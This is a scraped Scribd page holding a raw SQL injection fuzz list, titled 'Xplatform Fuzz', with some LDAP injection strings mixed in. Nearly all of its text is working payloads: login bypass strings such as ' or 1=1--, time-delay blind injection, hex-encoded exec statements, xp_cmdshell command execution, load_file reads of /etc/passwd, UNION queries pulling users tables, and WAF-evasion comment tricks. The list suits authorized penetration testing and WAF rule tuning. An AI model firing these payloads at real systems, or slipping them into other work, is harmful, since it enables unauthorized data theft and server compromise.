The document contains a comprehensive list of SQL injection techniques and payloads that can be used to bypass web application firewalls (WAF) and exploit vulnerabilities in SQL databases. It includes various forms of SQL commands, logical operators, and encoding methods to manipulate database queries. The content serves as a reference for security testing and understanding potential attack vectors in web applications.
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0 ratings0% found this document useful (0 votes)
3 views4 pages
Xplatform Fuzz
The document contains a comprehensive list of SQL injection techniques and payloads that can be used to bypass web application firewalls (WAF) and exploit vulnerabilities in SQL databases. It includes various forms of SQL commands, logical operators, and encoding methods to manipulate database queries. The content serves as a reference for security testing and understanding potential attack vectors in web applications.
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4
# to attempt with ids/waf evasion try like
# /index.aspx?page=select 1&page=2,3 from table where id=1
<>"'%;)(&+ | ! ? / // //* ' ' -- ( ) *| */* & 0 031003000270000 0 or 1=1 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 1 or 1=1 1;SELECT%20* 1 waitfor delay '0:0:10'-- '%20or%20''=' '%20or%201=1 ')%20or%20('x'='x '%20or%20'x'='x %20or%20x=x %20'sleep%2050' %20$(sleep%2050) %21 23 OR 1=1 %26 %27%20or%201=1 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C ||6 '||'6 (||6) %7C a' admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- anything' OR 'x'='x "a"" or 1=1--" a' or 1=1-- "a"" or 3=3--" a' or 3=3-- a' or 'a' = 'a '%20OR as asc a' waitfor delay '0:0:10'-- '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > bfilename char%4039%41%2b%40SELECT declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003 000270000 exec(@q) declare @q nvarchar (4000) select @q = declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @s varchar(22) select @s = declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e delete desc distinct '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '; exec master..xp_cmdshell '; exec master..xp_cmdshell 'ping 172.10.1.255'-- exec(@s) '; exec ('sel' + 'ect us' + 'er') exec sp '; execute immediate 'sel' || 'ect us' || 'er' exec xp '; exec xp_regread ' group by userid having 1=1-- handler having ' having 1=1-- hi or 1=1 --" hi' or 1=1 -- "hi"") or (""a""=""a" hi or a=a hi' or 'a'='a hi') or ('a'='a 'hi' or 'x'='x'; insert like limit *(|(mail=*)) *(|(objectclass=*)) or ' or ''=' or 0=0 #" ' or 0=0 -- ' or 0=0 # " or 0=0 -- or 0=0 -- or 0=0 # ' or 1 --' ' or 1/* ; or '1'='1' ' or '1'='1 ' or '1'='1'-- ' or 1=1 ' or 1=1 /* ' or 1=1-- ' or 1=1-- '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- " or 1=1-- or 1=1 or 1=1-- or 1=1 or ""= ' or 1=1 or ''=' ' or 1 in (select @@version)-- or%201=1 or%201=1 -- ' or 2 > 1 ' or 2 between 1 and 3 ' or 3=3 ‘ or 3=3 -- ' or '7659'='7659 or a=a or a = a ' or 'a'='a ' or a=a-- ') or ('a'='a " or "a"="a ) or (a=a order by ' or (EXISTS) or isNULL(1/0) /* " or isNULL(1/0) /* ' or 'something' like 'some%' ' or 'something' = 'some'+'thing' ' or 'text' = n'text' ' or 'text' > 't' ' or uid like '% ' or uname like '% ' or 'unusual' = 'unusual' ' or userid like '% ' or user like '% ' or username like '% ' or username like char(37); ' or 'whatever' in ('whatever') ' -- &password= password:*/=1-- PRINT PRINT @@variable procedure replace select ' select * from information_schema.tables-- ' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- ' (select top 1 --sp_password 'sqlattempt1 (sqlattempt2) 'sqlvuln '+sqlvuln (sqlvuln) sqlvuln; t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset ' UNION ALL SELECT ' union all select @@version-- ' union select uni/**/on sel/**/ect ' UNION SELECT ' union select 1,load_file('/etc/passwd'),1,1,1; ) union select * from information_schema.tables; ' union select * from users where login = char(114,111,111,116); update '||UTL_HTTP.REQUEST ,@variable @variable @var select @var as var into temp end -- \x27UNION SELECT x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND email IS NULL; -- x' AND members.email IS NULL; -- x' AND userid IS NULL; -- x' or 1=1 or 'x'='y x' OR full_name LIKE '%Bob% ý or 1=1 --